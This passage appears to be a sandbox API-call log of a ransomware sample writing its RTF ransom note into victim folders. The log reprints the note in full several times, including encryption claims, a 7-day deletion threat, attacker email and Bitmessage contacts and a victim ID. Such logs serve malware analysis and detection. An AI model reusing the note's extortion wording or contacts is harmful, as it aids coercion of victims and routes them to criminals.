\\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24657d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9aÓM", lpUsedDefaultChar=0x0) returned 8717 [0295.508] WriteFile (in: hFile=0x2ec, lpBuffer=0x24657d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24657d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.509] CloseHandle (hObject=0x2ec) returned 1 [0295.509] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mi-nz\\#readme_eman#.rtf")) returned 0xffffffff [0295.509] GetLastError () returned 0x2 [0295.509] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mi-nz\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0295.510] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 